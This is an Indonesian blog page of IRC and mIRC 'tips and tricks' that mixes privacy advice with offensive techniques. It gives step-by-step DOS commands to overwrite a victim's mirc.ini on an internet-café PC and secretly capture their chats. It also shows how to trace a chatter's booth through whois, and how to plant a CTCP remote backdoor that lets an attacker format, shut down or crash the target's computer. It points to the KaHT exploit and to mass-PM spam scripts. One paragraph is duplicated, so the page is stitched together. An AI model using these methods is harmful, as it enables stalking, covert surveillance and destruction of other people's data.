? dan bagaimana cara kerjanya ? apa kelemahannya ? Script ini mampu memberikan pesan ke seluruh chatter dalam 1 channel meskipun anda langsung di ban oleh AOP, SOP bahkan founder waktu anda mengirim pesan oleh chatter-chatter, tapi pesan anda ke chatter tersebut tidak akan hilang / atau berhenti, tapi pengiriman pesan terus berjalan, bayangkan, apa kurang hebat ? tapi script ini mempunyai kelemahan yaitu kemampuan ini tidak akan berjalan jika anda masuk ke channel besar kayak #jakarta, #bandung, #yogyakarta, #solo, #semarang dan sebagainya, mengapa ? karena bagaimana mungkin kita chatting dengan semua orang di channel dalam 1 - 2 detik. jelas langsung disconect, cocoknya script ini dijalankan di channel yang ga begitu rame kaya #manado, #purwokerto, #yogya (kalo pas sepi) dan sebagainya. Sebelum kita memulai saran webmaster masuklah di Option dahulu untuk mengganti themenya menjadi MIRC, tapi kalau anda tidak ingin itu juga bukan masalah untuk percobaan script ini. Bagaimana cara menjalankan fasilitas ini ? Pada saat anda sudah connect ke dal.net dan masuk channel maka segera klik kanan saja pada room channel, lalu pilih pilihan other dan klik pada pilihan Send private message to everyone, dan tulis aja pesannya, nanti para chatter jika menjawab maka anda akan terasa di ajak chat duluan, hehe :) Sebenarnya banyak program-program luar biasa lainnya yang musti di punyai oleh anda para member, hanya saja family code disini memberikan informasi langka yang programnya ga ada di rental CD manapun di pelosok tanah air, menurut surfey Family Code, program-program hacker dan pemecah password udah banyak sekali di rental-rental CD seperti Passware Kit, trojan, backdoor dan lain-lainnya dan tentu saja semuanya bisa anda mudah dapatkan dengan sedikit money, jika anda merasa malas ke rental maka anda dapat langsung ke google aja mencari programnya, banyak banget, www.jasakom.com adalah sumber ilmu yang dapat anda pelajari sendiri. maaf kalo ada yang kurang,,,,, kaburrrrr,,,,,,,,,,,,,
Tips dan triks IRC (Special)
Tips dan triks IRC ini sangat populer di kalangan chatter karena tips dan triks ini berisi cara melindungi identitas diri kita dari para chatter lainnya sekaligus juga dapat untuk mengetahui keberadaan teman chatting kita, memata-matai dia, melihat isi chattingan dia sampai meremote mIRC teman chatting kita tersebut.
Tips di IRC
Nih tips untuk para chatter IRC, mau tahu ?
Pertama-tama..
Sebelum anda memulai chatting dengan mIRC ada 3 hal yang sangat penting yang harus anda perhatikan :
1. Periksa Full name pada option Connect, gantilah Full name jika ada nama warnetnya tertulis
2. Periksa pada option Connect lalu pada identd, gantilah "user id" jika ada nomor room tertulis disini.
3. Periksa pada option IRC lalu pada Logging, gantilah menjadi "none" pada "automatically logs" jika posisi diluar itu.
4. Periksa pada Windows Task Manager apakah ada Keylogger terpasang :)
Tips diatas itu adalah kewaspadaan standard agar kita tidak mudah diketahui teman chatter kita.
Efek jika tidak menuruti tips diatas maka efeknya adalah :
1. jika "user id" tersebut memberi angka / nama room saat anda sedang chatting maka anda sama saja membuka diri
2. Jika pada logging bukan "none" maka bersiap-siaplah isi chattingan anda dilihat orang ketiga
3. Keylogger adalah program yang berbahaya jika terpasang, Ini yang cukup susah diperiksa jika tidak ada program scanner keylogger, tapi jika anda ingin memeriksanya tekan Ctrl+Alt+del, lihat list program yang sedang berjalan, jika ada nama program yang aneh dan asing berjalan maka matikan saja prosesnya tapi anda harus hati-hati dalam melakukanya, tapi dari semua itu anda tidak perlu resah karena kenyataanya sangat jarang ada user melakukan hal ini karena warnet-warnet saat ini telah dilengkapi program-program canggih untuk menangani hal beginian (restore).
hehehehehe,,,,,,,,,,,
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Tips tambahan di IRC
Tips tambahan khusus para chatter yang ingin menyembunyikan diri
Jika anda ingin chatting benar-benar tidak ingin ada yang tahu keberadaan anda maka anda bisa mengikuti tips kehati-hatian ini, karena memang kadang tips ini sering kali dilupakan karena memang tips ini sedikit gerah untuk dilaksanakan, tapi gak ada salahnya kan kita mencoba ?
1. Periksalah Quit Message pada menu pilihan IRC lalu messages, jika disitu muncul nama dan alamat warnet maka segera gantilah pesan itu dengan kalimat lain atau dikosongkan saja, karena jika anda mengaktifkannya maka pada saat keluar dari IRC maka pesan ini akan muncul di channel dan orang lain akan mengetahui dimana anda berada saat chatting.
2. Ssetelah keluar / disconnect dari mIRC, jangan lupa masuk mIRC lagi, dan segera ganti nama, e-mail, nickname alternative juga user id karena jika anda lupa menggantinya maka orang yang menggunakan komputer setelah anda akan mengetahui nama, e-mail, nickname,. alternativ dan user id anda.
3. Jangan lupa, jika anda sering copy paste, segera hilangkan memory copy paste anda dengan melakukan copy text lain untuk menghindari orang lain untuk mengetahui paste text anda.
Semoga informasi diatas dapat membantu dan menambah pengetahuan anda.
hehheheh,,,,,,,,,,,,
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Tips tambahan di IRC II
Tips agar kita tidak diremote atau dipermainkan di IRC
Sudah biasa banyak sekali spam di IRC yang menganggu contohnya ini :
WANNA BE OPERATOR #channel ?? copy/paste this-> < <== Jangan copy paste di mIRC anda kalau ada hal beginian karena dapat merusak / menyerang komputer anda (Sering ada di channel-channel besar, webmaster dah cek ) STOP SPAM copy/paste this-> <<== Ini juga sama saja Cara menangani para cracker : 1. Periksalah remote mIRC anda caranya Tahan Alt lalu tekan R. 2. Biasanya mIRC-mIRC warnet dikosongkan remotenya tapi jika ada isinya lebuh baik delete remote yang sekiranya aneh (asing). 3. Periksa timer anda, caranya (ketik /timer ) jika misal ada timer yang bekerja ketik //!timers off 4. Menghilangkan decode : Ketik kode ini di mIRC : //!timers off !ignore -r !unload -rsn " $+ $chr(160) $+ . $+ $chr(160) $+ " !remove " $+ $chr(160) $+ . $+ $chr(160) $+ " !say $script($script(0)) Penulis : BeRgUnDaL.... Referensi rhega (OP #Yogyakarta) Triks di IRC : Cara agar bisa masuk ke dal.net dal.net dimana sebelumnya tidak bisa masuk karena trojan atau virus ? masuklah ke irc.server.telkom.net.id setelah itu baru baru membuka server dal.net, jika masih tidak bisa maka anda harus mencari program scan antivirus dan trojan, anda dapat mendownloadnya berdasar referensi DAL.NET pada saat pesan terahkir connect. Bagaimana cara melacak keberadaan teman chat kita ? Whois saja chatter tersebut lalu cocokkan ip addreasnya dengan daftar ip addreas warnet Yogya di samping kanan. Jika ip addreas anda tidak ada dalam daftar maka anda dapat menggunakan pelacakan lain seperti http://www.apnic.org, :) Bagaimana cara melacak boks warnet teman chat kita ? Whois saja chatter tersebut lalu lihat sebelah kiri dari sebelum tanda "@ip addreas", jika ada angka maka kemungkinan besar dia di room tersebut, jika tidak ada maka periksa ip addreasnya apakah warnet tersebut menerapkan berbeda ip addreas tiap boks, jika iya maka hitunglah logika ip addreas tersebut sehingga ahkirnya dapat menemukan tempat boks teman chat anda. Bagaimana kita ingin mencari teman chat di warnet sendiri (Hanya untuk channel yang memiliki BOT khusus !seen)? D di channel #yogyakarta cukup ketikkan !seen *!*@ip addreas warnet anda, bisa juga dengan !seen nickname, fasilitas ini biasanya disediakan channel-channel besar tapi tidak menutep channel kecilpun mempunyai fasilitas ini. Bagaimana kita ingin mencari teman chat di warnet sendiri ? (Dari perintah DAL.NET! Tidak perlu BOT channel) /who #nama channel *@ip addreas warnet (cara ini sangat efektif jika BOT channel benar-benar memproteksi para chatter sehingga sangat membatasi informasi yang akan diberikan kepada anda). Bagaimana kita ingin mencari nickname teman kita di channel #yogyakarta ? cukup mudah, ketikkan di channel #yogyakarta !seen nickname teman kita. Bagaimana cara kita memata-matai teman chat kita di satu warnet ? Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah di logs mirc teman kita biasanya di "c:\program files\mirc\logs". Bagaimana cara kita meyakinkan bahwa teman chat kita disuatu room memang benar adanya memakai nickname yang kita maksud ? Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah ke directory mirc teman kita biasanya di "c:\program files\mirc" lalu buka file mirc.ini. Jika anda mengalami masalah tiap komputer dipassword maka anda dapat memanfaatkan program Internet Maniac beserta PQwak, jika tiap komputer menggunakan Windows XP, tembus aja pakek KAHT yang bisa kamu download disini. Proteksi diri di IRC dapat dilakukan dengan PSY dan Proxy tapi yang umum dan tidak memakan biaya adalah menggunakan proxy, bagaimana caranya ? Carilah proxy di google, kemudian pastekan ke option mIRC yaitu pada "connect" lalu "firewall', firewall support diganti "server", protocol diganti "proxy" lalu tinggal anda isi hostname dan portnya sesuai dengan proxy yang anda dapatkan. Referensi untuk mendapatkan proxy : - http://www.proxyweb.net - http://proxy.lessel.us/cgi-bin/nph-proxy.cgi - http://www.multiproxy.org - http://www.publicproxyservers.com/index.html - http://www.hotscripts.com/Detailed/28480.html - http://www.inetprivacy.com/a4proxy/anonymous-grc.htm - http://www.sa6ry.com/surfanonymous/faq/hide-ip-address.html - http://www.steganos.com (proxy) - http://www.guardster.com (free proxy) - http://www.anonymizer.com/index.cgi (proxy) - http://www.orangatango.com/home/index.ie.html (proxy) - http://proxify.com - http://www.tehbox.com/proxy - http://www.proxy4free.com/index.html - http://www.stayinvisible.com/index.pl - http://free-proxies.com (Referensi Proxy dari Si Cebol, Indonewbies.tk) Menampilkan ip-ip addreas para chatter di channel? Pada Option lalu pilih IRC lalu aktifkan / centang pada Show Ip Addreasess Penulis : BeRgUnDaL *Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member) Special triks di IRC : Melihat seluruh isi chattingan teman kita disatu warnet walaupun komputer client / server tidak dishare sama sekali ! Luar biasa ! (Ilmu rahasia kreasi webmaster sendiri pada bulan November 2004) Syarat untuk melakukan teknik memata-matai orang chatting di satu jaringan LAN (Local Area network) adalah sebagai berikut : 1. Menguasai MS-DOS dengan baik (Karena disini semua menggunakan DOS) 2. Punya logika yang baik dan dapat mengetik cepat (Karena disini anda dikejar dengan waktu dan membutuhkan pemikiran yang cepat) Baiklah kita langsung saja, terapkan ilmu KaHT seperti ditutorial hacker lalu untuk masuk ke komputer sasaran, setelah anda masuk dikomputer tujuan, segera anda masuk ke MiRC komputer sasaran biasanya ada di c:\program files\mirc (ketik : "cd\progra~1\mirc") tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : "cd\mirc") A. Untuk komputer yang drive D-nya di share : Saat ini anda periksa apakah komputer sasaran drive d-nya dishare ? jika ya ikuti cara dibawah ini jadi kodenya seperti dibawah ini kalau mau lengkap seperti ini [dirs] logdir=d:\ [options] n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0 setelah itu tekan ctrl + z untuk menyimpan, lalu tinggal anda masuk ke drive D komputer tersebut melalui LAN yang tentu saja sudah dishare, jadi cukup double klik aja files berekstensi log, lalu buka files itu pakek notepad untuk melihat terus isi chattingannya. Jadi kesimpulannya yang membuat penyimpanan file log di drive D karena perintah : [dirs] logdir=d:\ Jika anda bingung dalam menghitungkan angkanya diatas, ini urutannya untuk mempermudah: 1. 5=1x 2. 100=1x 3. 0=7x 4. 1=1x 5. 0=1x 6. 1=7x 7. 0=2x 8. 1=3x 9. 0=1x 10. 5=1x 11. 0=5x 12. 1=1x 13. 0=2x B. Untuk komputer sasaran tidak dishare : Setelah anda membaca cara A Lalu sekarang bagaimana jika drive d tidak dishare ? tidak masalah ! kita tetap bisa mengikuti isi chattingan dia, caranya seperti diawal tadi yaitu cari dahulu program mIRC komputer sasaran yang biasanya ada di c:\program files\mirc (ketik : "cd\progra~1\mirc") tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : "cd\mirc") Setelah kita masuk didirektory MiRC, ketik "del mirc ini" setelah itu ketik "copy con mirc.ini" lalu ketik kode rekam mirc.ini dibawah ini : [options] n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0 setelah itu tekan ctrl + z untuk menyimpan, lalu silahkan tengok di "c:\progra~1\mirc\logs" cara melihat cukup ketik "type nickname.log* * : Nickname diisi nick orang Luar biasa buka, ingat sebagai catatan, Agar teknik berjalan baik maka teknik ini dilakukan / diterapkan pada semua boks warnet sebelum chatter tersebut chatting diboks tersebut, atau kalau udah terlanjut dia chatting di boks tersebut maka diset rekam aja MiRCnya gpp, sapa tahu MiRCnya error lalu dia buka lagi, :) Dari tutorial ini maka dimanapun anda berada, semua isi chatting anda dapat dilihat orang walaupun anda tidak menyadarinya, "anda tidak melihat kami tapi kami melihat anda" :)) Penulis : BeRgUnDaL *Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member) Remote IRC (Mengontrol 100% segala chattingan user) ketikkan perintah "ctcp *:*:?:$1-" ke dalam remote mIRC sasaran lalu masukan juga di dalam variables "%master Nick_kamu". Perintah mengontrol komputer target : /ctcp run rundll user,#7 : Melakukan Shutdown komputer sasaran /ctcp run rundll user,#3 : Membuat Crash / Hang komputer sasaran /ctcp run rundll user,#4 : Mengacaukan tampilan yang ahkirnya komputer sasaran Crash /Hang /ctcp run format /y : Melakukan format pada komputer sasaran /ctcp run http://.com : Membuka situs sesuai keinginan kamu /ctcp /nick : Mengganti nick mIRC sasaran (Perintah lainnya dapat dilihat di Peritah DAl.NET) *Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member) Kedasyatan Hennes Script NW v0.61 IRC Hennes Script NW v0.61 IRC : Download hennes Script NW v0.61 Percayakah anda bahwa dengan script ini anda bisa mendapatkan puluhan kenalan baru bahkan mungkin ratusan dengan hitungan menit ? Anda harus coba jika anda sering mencari teman lewat Via IRC, karena script ini benar-benar hebat dalam melakukan mengirim pesan ke chatter-chatter, dan selain itu juga juga bisa diandalkan untuk inviter dan advertising apa saja, wow! Lalu apa yang membuat kemampuan script ini begitu hebat ? dan bagaimana cara kerjanya ? apa kelemahannya ? Script ini mampu memberikan pesan ke seluruh chatter dalam 1 channel meskipun anda langsung di ban oleh AOP, SOP bahkan founder waktu anda mengirim pesan oleh chatter-chatter, tapi pesan anda ke chatter tersebut tidak akan hilang / atau berhenti, tapi pengiriman pesan terus berjalan, bayangkan, apa kurang hebat ? tapi script ini mempunyai kelemahan yaitu kemampuan ini tidak akan berjalan jika anda masuk ke channel besar kayak #jakarta, #bandung, #yogyakarta, #solo, #semarang dan sebagainya, mengapa ? karena bagaimana mungkin kita chatting dengan semua orang di channel dalam 1 - 2 detik. jelas langsung disconect, cocoknya script ini dijalankan di channel yang ga begitu rame kaya #manado, #purwokerto, #yogya (kalo pas sepi) dan sebagainya. Sebelum kita memulai saran webmaster masuklah di Option dahulu untuk mengganti themenya menjadi MIRC, tapi kalau anda tidak ingin itu juga bukan masalah untuk percobaan script ini. Bagaimana cara menjalankan fasilitas ini ? Pada saat anda sudah connect ke dal.net dan masuk channel maka segera klik kanan saja pada room channel, lalu pilih pilihan other dan klik pada pilihan Send private message to everyone, dan tulis aja pesannya, nanti para chatter jika menjawab maka anda akan terasa di ajak chat duluan, hehe :) Sebenarnya banyak program-program luar biasa lainnya yang musti di punyai oleh anda para member, hanya saja family code disini memberikan informasi langka yang programnya ga ada di rental CD manapun di pelosok tanah air, menurut surfey Family Code, program-program hacker dan pemecah password udah banyak sekali di rental-rental CD seperti Passware Kit, trojan, backdoor dan lain-lainnya dan tentu saja semuanya bisa anda mudah dapatkan dengan sedikit money, jika anda merasa malas ke rental maka anda dapat langsung ke google aja mencari programnya, banyak banget, www.jasakom.com adalah sumber ilmu yang dapat anda pelajari sendiri. maaf kalo ada yang kurang,,,,, kaburrrrr,,,,,,,,,,,,,
Langganan:
Postingan (Atom)